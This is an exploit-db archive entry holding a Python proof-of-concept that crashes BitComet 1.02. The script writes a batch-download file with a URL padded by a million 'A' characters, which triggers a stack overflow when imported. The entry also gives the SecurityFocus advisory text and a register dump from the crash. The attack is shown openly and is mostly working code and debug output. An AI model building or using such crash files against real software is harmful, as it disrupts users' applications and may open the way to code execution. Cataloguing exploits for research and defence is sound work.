exploit-db-mirror/exploits/windows/dos/32056.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

39 lines
No EOL
1.9 KiB
Python
Executable file

source: https://www.securityfocus.com/bid/30255/info
BitComet is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the application. Given the nature of this vulnerability, the attacker may also be able to execute arbitrary code, but this has not been confirmed.
BitComet 1.02 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# BitComet 1.02 [HTTP/FTP Batch Download] url DOS
#This python script will generate an evil_batch.txt file that when
#loaded into bitcomet for batch downloading it will result in a crash.
#The vulnerability resides in failure to handle overly long urls.
#(File->HTTP/FTP Batch Download->Import URL from file->OK)
#Debug output:
# ----------------------------------------------------------------
# Exception C00000FD (STACK_OVERFLOW)
# ----------------------------------------------------------------
# EAX=00032000: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
# EBX=06E90020: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
# ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C90EB94: C3 8D A4 24 00 00 00 00-8D 64 24 00 90 90 90 90
# ESP=0012B354: 66 9A 80 7C 5C 85 57 00-5C F9 B1 00 00 F0 5F 01
# EBP=0012B380: 04 B4 12 00 83 8B 57 00-20 00 E9 06 50 00 00 00
# ESI=015FF000: 14 CB 99 00 E4 05 00 00-06 00 00 00 3F 00 00 00
# EDI=001E8482: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
# EIP=00707E07: 85 00 EB E9 55 8B EC 51-53 56 8B F0 33 DB 3B F3
# --> TEST [EAX],EAX
# ----------------------------------------------------------------
#
#
#Found by: Shinnok raydenxy [at] yahoo dot com
batch = 'http://'
badstr = 'A' * 1000000
batch += badstr
f = open('evil_batch.txt','wb')
f.write(batch);
f.close